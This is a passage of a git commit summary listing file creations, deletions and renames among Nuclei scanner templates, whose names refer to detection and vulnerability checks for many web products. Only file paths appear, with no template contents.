nuclei-templates/{CVE-2024/CVE-2024-3848.yaml => Other/mlflow-CVE-2024-3848.yaml} (100%) delete mode 100644 nuclei-templates/Other/mobileiron(1).yaml create mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce-8904.yaml delete mode 100644 nuclei-templates/Other/mobileiron-log4j-jndi-rce-8906.yaml create mode 100644 nuclei-templates/Other/mobileiron.yaml delete mode 100644 nuclei-templates/Other/mofi4500-default-login-8914.yaml create mode 100644 nuclei-templates/Other/mofi4500-default-login.yaml delete mode 100644 nuclei-templates/Other/moinmoin-detect-8915.yaml create mode 100644 nuclei-templates/Other/moinmoin-detect-8916.yaml create mode 100644 nuclei-templates/Other/mongodb-detect-8919.yaml delete mode 100644 nuclei-templates/Other/mongodb-detect-8920.yaml delete mode 100644 nuclei-templates/Other/mongodb-ops-manager-8922.yaml create mode 100644 nuclei-templates/Other/mongodb-ops-manager-8924.yaml rename nuclei-templates/Other/{mongodb-unauth-8927.yaml => mongodb-unauth-8926.yaml} (100%) create mode 100644 nuclei-templates/Other/monitorix-exposure-8930.yaml delete mode 100644 nuclei-templates/Other/monitorix-exposure-8933.yaml create mode 100644 nuclei-templates/Other/moodle-changelog-8936.yaml delete mode 100644 nuclei-templates/Other/moodle-changelog.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8937.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8940.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8946.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8947.yaml create mode 100644 nuclei-templates/Other/moodle-xss-8948.yaml delete mode 100644 nuclei-templates/Other/moodle-xss-8950.yaml rename nuclei-templates/Other/{movable-type-login-8953.yaml => movable-type-login.yaml} (100%) rename nuclei-templates/Other/{moveit-transfer-detect.yaml => moveit-detect.yaml} (100%) rename nuclei-templates/Other/{mpsec-lfi-8957.yaml => mpsec-lfi-8954.yaml} (100%) rename nuclei-templates/Other/{ms-exchange-server-reflected-xss-8964.yaml => ms-exchange-server-reflected-xss-8965.yaml} (100%) rename nuclei-templates/Other/{msvod-sqli-8969.yaml => msvod-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/munin.yaml create mode 100644 nuclei-templates/Other/mx-fingerprint-8973.yaml delete mode 100644 nuclei-templates/Other/mx-fingerprint.yaml delete mode 100644 nuclei-templates/Other/mx-service-detector-8974.yaml create mode 100644 nuclei-templates/Other/mx-service-detector-8977.yaml create mode 100644 nuclei-templates/Other/mysql-native-password-8980.yaml delete mode 100644 nuclei-templates/Other/mysql-native-password-8981.yaml rename nuclei-templates/Other/{myucms-lfr-8985.yaml => myucms-lfr-8987.yaml} (100%) create mode 100644 nuclei-templates/Other/nagios-default-login-8991.yaml delete mode 100644 nuclei-templates/Other/nagios-default-login-8993.yaml create mode 100644 nuclei-templates/Other/nameserver-fingerprint-8998.yaml delete mode 100644 nuclei-templates/Other/nameserver-fingerprint.yaml rename nuclei-templates/Other/{natshell-path-traversal-9005.yaml => natshell-path-traversal-9008.yaml} (100%) create mode 100644 nuclei-templates/Other/natshell-rce-9009.yaml delete mode 100644 nuclei-templates/Other/natshell-rce-9012.yaml create mode 100644 nuclei-templates/Other/neos-detect-9014.yaml delete mode 100644 nuclei-templates/Other/neos-detect.yaml create mode 100644 nuclei-templates/Other/nessus.yaml rename nuclei-templates/Other/{Netcore-unauth.yaml => netcore-unauth.yaml} (100%) rename nuclei-templates/Other/{Netentsec-Ngfw-Rce.yaml => netentsec-ngfw-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/netflix-conductor-ui-9023.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-ui.yaml rename nuclei-templates/Other/{netgear-router-auth-bypass-9027.yaml => netgear-router-auth-bypass.yaml} (100%) rename nuclei-templates/Other/{netgear-router-exposure.yaml => netgear-router-exposure-9028.yaml} (100%) create mode 100644 nuclei-templates/Other/netlify-takeover-9043.yaml delete mode 100644 nuclei-templates/Other/netlify-takeover-9044.yaml create mode 100644 nuclei-templates/Other/netscalar-aaa-login-9047.yaml delete mode 100644 nuclei-templates/Other/netscalar-aaa-login-9049.yaml delete mode 100644 nuclei-templates/Other/netscaler-gateway-9056.yaml create mode 100644 nuclei-templates/Other/netscaler-gateway.yaml delete mode 100644 nuclei-templates/Other/netsus-default-login-9060.yaml create mode 100644 nuclei-templates/Other/netsus-default-login.yaml create mode 100644 nuclei-templates/Other/netsus-server-login-9061.yaml delete mode 100644 nuclei-templates/Other/netsus-server-login-9062.yaml rename nuclei-templates/Other/{netsweeper-open-redirect-9064.yaml => netsweeper-open-redirect.yaml} (100%) delete mode 100644 nuclei-templates/Other/nette-rce.yaml rename nuclei-templates/Other/{nextcloud-detect-9081.yaml => nextcloud-detect-9079.yaml} (100%) delete mode 100644 nuclei-templates/Other/nexus-default-login-9088.yaml create mode 100644 nuclei-templates/Other/nexus-default-login.yaml delete mode 100644 nuclei-templates/Other/nexus-detect-9094.yaml create mode 100644 nuclei-templates/Other/nexus-detect.yaml delete mode 100644 nuclei-templates/Other/nexus.yaml delete mode 100644 nuclei-templates/Other/nginx-Detect.yaml rename nuclei-templates/Other/{nginx-config.yaml => nginx-config-9098.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-detect.yaml create mode 100644 nuclei-templates/Other/nginx-linux-page-9102.yaml delete mode 100644 nuclei-templates/Other/nginx-linux-page-9103.yaml rename nuclei-templates/Other/{nginx-merge-slashes-path-traversal.yaml => nginx-merge-slashes-path-traversal-9104.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9106.yaml delete mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9108.yaml create mode 100644 nuclei-templates/Other/nginx-proxy-manager-9111.yaml delete mode 100644 nuclei-templates/Other/nginx-proxy-manager-9114.yaml rename nuclei-templates/Other/{nginx-vhost-traffic-status-9124.yaml => nginx-vhost-traffic-status.yaml} (100%) create mode 100644 nuclei-templates/Other/ngrok-takeover-9128.yaml delete mode 100644 nuclei-templates/Other/ngrok-takeover-9129.yaml create mode 100644 nuclei-templates/Other/nifi-detech-9131.yaml delete mode 100644 nuclei-templates/Other/nifi-detech-9132.yaml create mode 100644 nuclei-templates/Other/node-integration-enabled-9137.yaml delete mode 100644 nuclei-templates/Other/node-integration-enabled.yaml delete mode 100644 nuclei-templates/Other/npm.yaml delete mode 100644 nuclei-templates/Other/nps-default-login-9144.yaml create mode 100644 nuclei-templates/Other/nps-default-login.yaml create mode 100644 nuclei-templates/Other/ns-asg-file-read-9149.yaml delete mode 100644 nuclei-templates/Other/ns-asg-file-read-9153.yaml delete mode 100644 nuclei-templates/Other/ntlm-directories-9155.yaml create mode 100644 nuclei-templates/Other/ntlm-directories-9158.yaml create mode 100644 nuclei-templates/Other/nuclei_template.yaml create mode 100644 nuclei-templates/Other/nuuno-network-login-9161.yaml delete mode 100644 nuclei-templates/Other/nuuno-network-login.yaml rename nuclei-templates/Other/{nuuo-file-inclusion.yaml => nuuo-file-inclusion-9167.yaml} (100%) create mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9173.yaml delete mode 100644 nuclei-templates/Other/nuuo-nvrmini2-rce-9174.yaml create mode 100644 nuclei-templates/Other/oa-tongda-path-traversal-9178.yaml delete mode 100644 nuclei-templates/Other/oa-tongda-path-traversal-9179.yaml create mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9187.yaml delete mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9190.yaml delete mode 100755 nuclei-templates/Other/oauth-access-key-9184.yaml create mode 100755 nuclei-templates/Other/oauth-access-key.yaml create mode 100644 nuclei-templates/Other/octobercms-default-login-9192.yaml delete mode 100644 nuclei-templates/Other/octobercms-default-login-9193.yaml delete mode 100644 nuclei-templates/Other/octobercms-detect-9196.yaml create mode 100644 nuclei-templates/Other/octobercms-detect.yaml create mode 100644 nuclei-templates/Other/odoo-cms-redirect-9199.yaml delete mode 100644 nuclei-templates/Other/odoo-cms-redirect-9201.yaml rename nuclei-templates/Other/{odoo-database-manager-9205.yaml => odoo-database-manager-9202.yaml} (100%) rename nuclei-templates/Other/{officedocuments.yaml => office-documents-links.yaml} (100%) create mode 100644 nuclei-templates/Other/office365-open-redirect-9212.yaml delete mode 100644 nuclei-templates/Other/office365-open-redirect-9214.yaml delete mode 100644 nuclei-templates/Other/okiko-sfiler-portal-9227.yaml create mode 100644 nuclei-templates/Other/okiko-sfiler-portal-9230.yaml delete mode 100644 nuclei-templates/Other/okta-panel-9231.yaml create mode 100644 nuclei-templates/Other/okta-panel-9234.yaml rename nuclei-templates/Other/{oliver-library-lfi-9239.yaml => oliver-library-lfi-9240.yaml} (100%) rename nuclei-templates/Other/{olivetti-crf-detect-9244.yaml => olivetti-crf-detect-9243.yaml} (100%) create mode 100644 nuclei-templates/Other/omigod-220331-223015.yaml create mode 100644 nuclei-templates/Other/oneblog-detect-9246.yaml delete mode 100644 nuclei-templates/Other/oneblog-detect-9247.yaml create mode 100644 nuclei-templates/Other/onedev.yaml rename nuclei-templates/Other/{oob-header-based-interaction-9249.yaml => oob-header-based-interaction-9250.yaml} (100%) create mode 100644 nuclei-templates/Other/oos-bucket-public-access.yaml rename nuclei-templates/Other/{opcache-status-exposure-9255.yaml => opcache-status-exposure.yaml} (100%) rename nuclei-templates/Other/{open-mjpg-streamer-9282.yaml => open-mjpg-streamer-9284.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-proxy-localhost-9292.yaml create mode 100644 nuclei-templates/Other/open-proxy-localhost.yaml create mode 100644 nuclei-templates/Other/open-proxy-portscan-9294.yaml delete mode 100644 nuclei-templates/Other/open-proxy-portscan.yaml rename nuclei-templates/Other/{open-stack-dashboard-login.yaml => open-stack-dashboard-login-9323.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-virtualization-manager-detect-9325.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-detect.yaml delete mode 100644 nuclei-templates/Other/open-virtualization-manager-panel-9327.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-panel.yaml create mode 100644 nuclei-templates/Other/opencast-detect-9262.yaml delete mode 100644 nuclei-templates/Other/opencast-detect-9263.yaml delete mode 100644 nuclei-templates/Other/opencast-detect-9264.yaml create mode 100644 nuclei-templates/Other/opencast-detect-9265.yaml rename nuclei-templates/Other/{openemr-default-login.yaml => openemr-default-login-9270.yaml} (100%) create mode 100644 nuclei-templates/Other/openemr-detect-9271.yaml delete mode 100644 nuclei-templates/Other/openemr-detect-9273.yaml rename nuclei-templates/Other/{openerp-database.yaml => openerp-database-9275.yaml} (100%) create mode 100644 nuclei-templates/Other/opennms-web-console-9285.yaml delete mode 100644 nuclei-templates/Other/opennms-web-console.yaml create mode 100644 nuclei-templates/Other/openobserve-panel.yaml create mode 100644 nuclei-templates/Other/opensis-detect-9313.yaml create mode 100644 nuclei-templates/Other/opensis-lfi-9316.yaml delete mode 100644 nuclei-templates/Other/opensis-lfi-9317.yaml delete mode 100644 nuclei-templates/Other/opensis-panel.yaml delete mode 100644 nuclei-templates/Other/opensis-workflow-9319.yaml create mode 100644 nuclei-templates/Other/opensis-workflow.yaml rename nuclei-templates/Other/{opensns-rce.yaml => opensns-rce-9320.yaml} (100%) rename nuclei-templates/Other/{openwrt-default-login.yaml => openwrt-default-login-9332.yaml} (100%) create mode 100644 nuclei-templates/Other/operations-automation-default-page-9339.yaml delete mode 100644 nuclei-templates/Other/operations-automation-default-page-9340.yaml rename nuclei-templates/Other/{oracle-business-control-9346.yaml => oracle-business-control.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-dbass-detect-9350.yaml create mode 100644 nuclei-templates/Other/oracle-dbass-detect-9351.yaml rename nuclei-templates/Other/{oracle-ebs-sqllog-disclosure-9370.yaml => oracle-ebs-sqllog-disclosure-9367.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-ebs-xss-9375.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-xss.yaml create mode 100644 nuclei-templates/Other/oracle-http-server-12c-9382.yaml delete mode 100644 nuclei-templates/Other/oracle-http-server-12c.yaml rename nuclei-templates/Other/{oracle-httpserver-12c.yaml => oracle-httpserver12c.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-integrated-manager-9388.yaml delete mode 100644 nuclei-templates/Other/oracle-integrated-manager.yaml rename nuclei-templates/Other/{oracle-iplanet-web-server.yaml => oracle-iplanet-web-server-9392.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-oam-xss.yaml rename nuclei-templates/Other/{oracle-people-sign-in.yaml => oracle-people-sign-in-9399.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-siebel-xss-9400.yaml create mode 100644 nuclei-templates/Other/oracle-siebel-xss-9403.yaml rename nuclei-templates/Other/{owasp-juice-shop-detected-9416.yaml => owasp-juice-shop-detected-9415.yaml} (100%) rename nuclei-templates/Other/{owncloud-config-9420.yaml => owncloud-config.yaml} (100%) create mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur-9424.yaml delete mode 100644 nuclei-templates/Other/pacs-connexion-utilisateur-9426.yaml delete mode 100644 nuclei-templates/Other/pacsone-server-lfi-9429.yaml create mode 100644 nuclei-templates/Other/pacsone-server-lfi-9430.yaml delete mode 100644 nuclei-templates/Other/pagerduty.yaml create mode 100644 nuclei-templates/Other/panasonic-network-management-9448.yaml delete mode 100644 nuclei-templates/Other/panasonic-network-management-9450.yaml rename nuclei-templates/Other/{pandora-fms-console.yaml => pandora-fms-console-9453.yaml} (100%) rename nuclei-templates/Other/{panos-default-login-9455.yaml => panos-default-login-9457.yaml} (100%) create mode 100644 nuclei-templates/Other/parallels-html-client-9462.yaml delete mode 100644 nuclei-templates/Other/parallels-html-client-9464.yaml rename nuclei-templates/Other/{parentlink-xss-9466.yaml => parentlink-xss-9467.yaml} (100%) rename nuclei-templates/Other/{Paypal-braintree-token.yaml => paypal-braintree-token.yaml} (100%) create mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9470.yaml delete mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9472.yaml delete mode 100644 nuclei-templates/Other/pega-detect-9474.yaml create mode 100644 nuclei-templates/Other/pega-detect.yaml delete mode 100644 nuclei-templates/Other/pentaho-default-login-9477.yaml create mode 100644 nuclei-templates/Other/pentaho-default-login.yaml rename nuclei-templates/Other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%) delete mode 100644 nuclei-templates/Other/perl-status-9486.yaml create mode 100644 nuclei-templates/Other/perl-status-9487.yaml rename nuclei-templates/Other/{pgadmin-exposure.yaml => pgadmin-exposure-9488.yaml} (100%) rename nuclei-templates/Other/{phalcon-framework-source-9495.yaml => phalcon-framework-source-9494.yaml} (100%) rename nuclei-templates/Other/{php-debug-bar-9507.yaml => php-debug-bar-9506.yaml} (100%) create mode 100644 nuclei-templates/Other/php-errors-9509.yaml delete mode 100644 nuclei-templates/Other/php-errors-9511.yaml rename nuclei-templates/Other/{php-fpm-config-9514.yaml => php-fpm-config.yaml} (100%) create mode 100644 nuclei-templates/Other/php-proxy-detect-9545.yaml delete mode 100644 nuclei-templates/Other/php-proxy-detect.yaml rename nuclei-templates/Other/{php-timeclock-xss.yaml => php-timeclock-xss-9552.yaml} (100%) rename nuclei-templates/Other/{php8-dev-rce.yaml => php8devrce-220331-222821.yaml} (100%) rename nuclei-templates/Other/{phpcollab-detect-9501.yaml => phpcollab-detect.yaml} (100%) rename nuclei-templates/Other/{phpcollab-workflow-9502.yaml => phpcollab-workflow-9503.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpinfo-9517.yaml create mode 100644 nuclei-templates/Other/phpinfo-9520.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-misconfiguration.yaml rename nuclei-templates/Other/{pma-server-import.yaml => phpmyadmin-server-import.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpmyadmin-setup-9529.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-setup.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-sql-9536.yaml delete mode 100644 nuclei-templates/Other/phpok-sqli-9538.yaml create mode 100644 nuclei-templates/Other/phpok-sqli.yaml rename nuclei-templates/Other/{phppgadmin-panel-9539.yaml => phppgadmin-panel-9543.yaml} (100%) delete mode 100644 nuclei-templates/Other/phpunit-9557.yaml create mode 100644 nuclei-templates/Other/phpunit-9558.yaml create mode 100644 nuclei-templates/Other/phpwiki-lfi-9566.yaml delete mode 100644 nuclei-templates/Other/phpwiki-lfi-9568.yaml create mode 100644 nuclei-templates/Other/pi-hole-detect-9581.yaml delete mode 100644 nuclei-templates/Other/pi-hole-detect-9582.yaml create mode 100644 nuclei-templates/Other/pingdom-takeover-9585.yaml delete mode 100644 nuclei-templates/Other/pingdom-takeover.yaml rename nuclei-templates/Other/{pinpoint-unauth-9588.yaml => pinpoint-unauth.yaml} (100%) create mode 100644 nuclei-templates/Other/plastic-scm-login-9591.yaml delete mode 100644 nuclei-templates/Other/plastic-scm-login.yaml delete mode 100644 nuclei-templates/Other/platform.yaml create mode 100644 nuclei-templates/Other/plesk-onyx-9601.yaml delete mode 100644 nuclei-templates/Other/plesk-onyx-login.yaml rename nuclei-templates/Other/{plone-cms-detect-9608.yaml => plone-cms-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/pmb-local-file-disclosure-9615.yaml create mode 100644 nuclei-templates/Other/pmb-local-file-disclosure-9620.yaml delete mode 100644 nuclei-templates/Other/pollbot-redirect-9623.yaml create mode 100644 nuclei-templates/Other/pollbot-redirect.yaml rename nuclei-templates/Other/{polycom-login-9625.yaml => polycom-login-9627.yaml} (100%) rename nuclei-templates/Other/{portainer-init-deploy-9630.yaml => portainer-init-deploy-9628.yaml} (100%) create mode 100644 nuclei-templates/Other/possible-AEM-secrets.yaml rename nuclei-templates/Other/{powercreator-cms-rce-9647.yaml => powercreator-cms-rce-9646.yaml} (100%) rename nuclei-templates/Other/{prestashop-detect.yaml => prestashop-detect-9651.yaml} (100%) rename nuclei-templates/Other/{printers-info-leak-9652.yaml => printers-info-leak.yaml} (100%) delete mode 100644 nuclei-templates/Other/private-key-9657.yaml create mode 100644 nuclei-templates/Other/private-key.yaml delete mode 100644 nuclei-templates/Other/processmaker-lfi-9659.yaml create mode 100644 nuclei-templates/Other/processmaker-lfi-9660.yaml rename nuclei-templates/Other/{production-logs.yaml => production-logs-9663.yaml} (100%) rename nuclei-templates/Other/{proftpd-config-9667.yaml => proftpd-config.yaml} (100%) rename nuclei-templates/Other/{project-insight-login.yaml => project-insight-login-9668.yaml} (100%) rename nuclei-templates/Other/{prometheus-config-endpoint-9671.yaml => prometheus-config-endpoint.yaml} (100%) rename nuclei-templates/Other/{prometheus-exporter.yaml => prometheus-exporter-9677.yaml} (100%) delete mode 100644 nuclei-templates/Other/prometheus-exposed-panel.yaml rename nuclei-templates/Other/{prometheus-flags-9687.yaml => prometheus-flags.yaml} (100%) delete mode 100644 nuclei-templates/Other/prometheus-targets-9691.yaml create mode 100644 nuclei-templates/Other/prometheus-targets-9692.yaml rename nuclei-templates/Other/{prometheus-targets-endpoint-9688.yaml => prometheus-targets-endpoint.yaml} (100%) create mode 100644 nuclei-templates/Other/promothoues-panel.yaml rename nuclei-templates/Other/{proposify-takeover-9693.yaml => proposify-takeover.yaml} (100%) create mode 100644 nuclei-templates/Other/prototype-pollution-check-9699.yaml delete mode 100644 nuclei-templates/Other/prototype-pollution-check.yaml delete mode 100644 nuclei-templates/Other/provider-path.yaml rename nuclei-templates/Other/{prtg-detect.yaml => prtg-detect-9705.yaml} (100%) create mode 100644 nuclei-templates/Other/ptr-fingerprint-9707.yaml delete mode 100644 nuclei-templates/Other/ptr-fingerprint.yaml create mode 100644 nuclei-templates/Other/public-actiontrail-bucket.yaml delete mode 100644 nuclei-templates/Other/public-tomcat-manager-9708.yaml create mode 100644 nuclei-templates/Other/public-tomcat-manager.yaml rename nuclei-templates/Other/{pulse-secure-panel-9712.yaml => pulse-secure-panel-9714.yaml} (100%) delete mode 100644 nuclei-templates/Other/puppetboard-panel-9716.yaml create mode 100644 nuclei-templates/Other/puppetboard-panel.yaml rename nuclei-templates/Other/{puppetdb-detect.yaml => puppetdb-detect-9717.yaml} (100%) create mode 100644 nuclei-templates/Other/puppetserver-detect-9721.yaml delete mode 100644 nuclei-templates/Other/puppetserver-detect-9722.yaml delete mode 100644 nuclei-templates/Other/put-m-enb.yaml create mode 100644 nuclei-templates/Other/put-method-enabled-9728.yaml delete mode 100644 nuclei-templates/Other/putty-private-key-disclosure-9732.yaml create mode 100644 nuclei-templates/Other/putty-private-key-disclosure.yaml rename nuclei-templates/Other/{pypicloud-panel-9734.yaml => pypicloud-panel.yaml} (100%) rename nuclei-templates/Other/{pyproject-disclosure-9737.yaml => pyproject-disclosure.yaml} (100%) rename nuclei-templates/Other/{pyramid-debug-toolbar-9741.yaml => pyramid-debug-toolbar.yaml} (100%) rename nuclei-templates/Other/{python-app-sql-exceptions.yaml => python-app-sql-exceptions-9744.yaml} (100%) delete mode 100644 nuclei-templates/Other/python-metrics-9745.yaml create mode 100644 nuclei-templates/Other/python-metrics-9747.yaml rename nuclei-templates/Other/{qi-anxin-netkang-next-generation-firewall-rce-9755.yaml => qi-anxin-netkang-next-generation-firewall-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/qihang-media-disclosure-9762.yaml create mode 100644 nuclei-templates/Other/qihang-media-disclosure.yaml rename nuclei-templates/Other/{qizhi-login-byPass.yaml => qizhi-login-bypass.yaml} (100%) create mode 100644 nuclei-templates/Other/qnap-qts-panel-9770.yaml delete mode 100644 nuclei-templates/Other/qnap-qts-panel.yaml rename nuclei-templates/{wordpress/2378487680.yaml => Other/quasar.yaml} (100%) create mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce-9773.yaml delete mode 100644 nuclei-templates/Other/qvisdvr-deserialization-rce.yaml delete mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9776.yaml create mode 100644 nuclei-templates/Other/rabbitmq-dashboard.yaml rename nuclei-templates/Other/{rabbitmq-default-login-9786.yaml => rabbitmq-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/race-multiple.yaml delete mode 100644 nuclei-templates/Other/race-simple.yaml create mode 100644 nuclei-templates/Other/rack-mini-profiler-9789.yaml delete mode 100644 nuclei-templates/Other/rack-mini-profiler-9791.yaml create mode 100644 nuclei-templates/Other/radius-manager-9794.yaml delete mode 100644 nuclei-templates/Other/radius-manager-9795.yaml create mode 100644 nuclei-templates/Other/rails-database-config-9802.yaml delete mode 100644 nuclei-templates/Other/rails-database-config-9803.yaml rename nuclei-templates/Other/{rails-debug-mode-9807.yaml => rails-debug-mode.yaml} (100%) delete mode 100644 nuclei-templates/Other/rails-secret-token-disclosure-9810.yaml create mode 100644 nuclei-templates/Other/rails-secret-token-disclosure.yaml delete mode 100644 nuclei-templates/Other/rails6-xss-9797.yaml create mode 100644 nuclei-templates/Other/rails6-xss-9798.yaml delete mode 100644 nuclei-templates/Other/rce-cve-2021-41773.yaml rename nuclei-templates/Other/{rce-shellshock-user-agent-9831.yaml => rce-shellshock-user-agent-9832.yaml} (100%) delete mode 100644 nuclei-templates/Other/rconfig-rce-9834.yaml create mode 100644 nuclei-templates/Other/rconfig-rce-9837.yaml rename nuclei-templates/Other/{rdp-detect-9838.yaml => rdp-detect-9840.yaml} (100%) create mode 100644 nuclei-templates/Other/readthedocs-takeover-9844.yaml delete mode 100644 nuclei-templates/Other/readthedocs-takeover-9845.yaml create mode 100644 nuclei-templates/Other/redash-detection.yaml delete mode 100644 nuclei-templates/Other/redash-panel.yaml create mode 100644 nuclei-templates/Other/redis-server.yaml delete mode 100644 nuclei-templates/Other/redis.yaml delete mode 100644 nuclei-templates/Other/redmin-cli-detect.yaml create mode 100644 nuclei-templates/Other/redmine-cli-detect.yaml rename nuclei-templates/Other/{remkon-manager-detect-9857.yaml => remkon-manager-detect.yaml} (100%) create mode 100644 nuclei-templates/Other/request-based-interaction-9863.yaml delete mode 100644 nuclei-templates/Other/request-based-interaction.yaml create mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9865.yaml delete mode 100644 nuclei-templates/Other/resin-cnnvd-200705-315-9866.yaml rename nuclei-templates/Other/{resin-viewfile-lfr-9874.yaml => resin-viewfile-lfr.yaml} (100%) create mode 100644 nuclei-templates/Other/rhymix-cms-detect-9878.yaml delete mode 100644 nuclei-templates/Other/rhymix-cms-detect-9879.yaml create mode 100644 nuclei-templates/Other/ricoh-weak-password-9880.yaml delete mode 100644 nuclei-templates/Other/ricoh-weak-password-9882.yaml rename nuclei-templates/Other/{ricoh-weak-password.yaml => ricoh-weak-password-9883.yaml} (100%) create mode 100644 nuclei-templates/Other/ricoh-webimagemonitor-panel.yaml create mode 100644 nuclei-templates/Other/robomongo-credential-9884.yaml delete mode 100644 nuclei-templates/Other/robomongo-credential.yaml rename nuclei-templates/Other/{robots.txt.yaml => robots-9889.yaml} (100%) create mode 100644 nuclei-templates/Other/rocketmq-console-exposure-9894.yaml delete mode 100644 nuclei-templates/Other/rocketmq-console-exposure.yaml rename nuclei-templates/Other/{rockmongo-xss-9902.yaml => rockmongo-xss-9904.yaml} (100%) rename nuclei-templates/Other/{roundcube-log-disclosure.yaml => roundcube-log-disclosure-9905.yaml} (100%) create mode 100644 nuclei-templates/Other/routeros-login-9908.yaml delete mode 100644 nuclei-templates/Other/routeros-login.yaml delete mode 100644 nuclei-templates/Other/rsa-self-service-9910.yaml create mode 100644 nuclei-templates/Other/rsa-self-service-9912.yaml delete mode 100644 nuclei-templates/Other/rseenet-default-login-9915.yaml create mode 100644 nuclei-templates/Other/rseenet-default-login.yaml rename nuclei-templates/Other/{rseenet-detect.yaml => rseenet-detect-9916.yaml} (100%) rename nuclei-templates/Other/{ruijie-EG-fileDownload.yaml => ruijie-EG-fileDown.yaml} (100%) delete mode 100644 nuclei-templates/Other/ruijie-eg-password-leak-9924.yaml create mode 100644 nuclei-templates/Other/ruijie-eg-password-leak.yaml rename nuclei-templates/Other/{ruijie-nbr1300g-exposure.yaml => ruijie-nbr1300g-exposure-9936.yaml} (100%) delete mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9940.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-lfi-9941.yaml create mode 100644 nuclei-templates/Other/ruijie-networks-rce-9948.yaml delete mode 100644 nuclei-templates/Other/ruijie-networks-rce-9949.yaml rename nuclei-templates/Other/{rusty-joomla-9955.yaml => rusty-joomla.yaml} (100%) delete mode 100644 nuclei-templates/Other/rxss.yaml rename nuclei-templates/Other/{s3-detect-9965.yaml => s3-detect-9963.yaml} (100%) rename nuclei-templates/Other/{s3cmd-config.yaml => s3cmd-config-9961.yaml} (100%) delete mode 100644 nuclei-templates/Other/s3hunter.yaml delete mode 100644 nuclei-templates/Other/saferoads-vms-login-9970.yaml create mode 100644 nuclei-templates/Other/saferoads-vms-login-9974.yaml rename nuclei-templates/Other/{sage-detect-9977.yaml => sage-detect-9975.yaml} (100%) create mode 100644 nuclei-templates/Other/salesforce-aura-9983.yaml delete mode 100644 nuclei-templates/Other/salesforce-aura.yaml delete mode 100644 nuclei-templates/Other/samba-config-9986.yaml create mode 100644 nuclei-templates/Other/samba-config-9987.yaml create mode 100644 nuclei-templates/Other/samba-detect-9988.yaml delete mode 100644 nuclei-templates/Other/samba-detect.yaml delete mode 100644 nuclei-templates/Other/samba-swat-panel-9991.yaml create mode 100644 nuclei-templates/Other/samba-swat-panel.yaml delete mode 100644 nuclei-templates/Other/samsung-printer-detect-9993.yaml create mode 100644 nuclei-templates/Other/samsung-printer-detect.yaml create mode 100644 nuclei-templates/Other/samsung-wlan-ap-rce-10004.yaml delete mode 100644 nuclei-templates/Other/samsung-wlan-ap-rce-10010.yaml rename nuclei-templates/Other/{sangfor-ba-rce-10020.yaml => sangfor-BA-rce.yaml} (100%) delete mode 100644 nuclei-templates/Other/sangfor-ba-rce-10021.yaml delete mode 100644 nuclei-templates/Other/sangfor-edr-rce-10026.yaml create mode 100644 nuclei-templates/Other/sangfor-edr-rce.yaml create mode 100644 nuclei-templates/Other/sap-hana-xsengine-panel-10037.yaml delete mode 100644 nuclei-templates/Other/sap-hana-xsengine-panel.yaml rename nuclei-templates/Other/{sap-igs-detect-10039.yaml => sap-igs-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/sap-netweaver-detect-10042.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-detect-10044.yaml create mode 100644 nuclei-templates/Other/sap-netweaver-portal-10055.yaml delete mode 100644 nuclei-templates/Other/sap-netweaver-portal.yaml rename nuclei-templates/Other/{Sap-redirect.yaml => sap-redirect-10067.yaml} (100%) rename nuclei-templates/Other/{sapfiori-panel-10034.yaml => sapfiori-panel.yaml} (100%) create mode 100644 nuclei-templates/Other/sar2html-rce-10082.yaml delete mode 100644 nuclei-templates/Other/sar2html-rce.yaml rename nuclei-templates/Other/{sauter-login.yaml => sauter-login-10089.yaml} (100%) rename nuclei-templates/Other/{sceditor-detect.yaml => sceditor-detect-10094.yaml} (100%) create mode 100644 nuclei-templates/Other/seacms-rce-10100.yaml delete mode 100644 nuclei-templates/Other/seacms-rce-10102.yaml rename nuclei-templates/Other/{Seagate-media-rce.yaml => seagate-media-rce.yaml} (100%) rename nuclei-templates/Other/{Seagate-media-sqli.yaml => seagate-media-sqli.yaml} (100%) rename nuclei-templates/Other/{secnet-ac-default-login.yaml => secnet-ac-default-login-10113.yaml} (100%) create mode 100644 nuclei-templates/Other/secure-transfeross-disabled.yaml rename nuclei-templates/Other/{securepoint-utm.yaml => securepoint-utm-10118.yaml} (100%) delete mode 100644 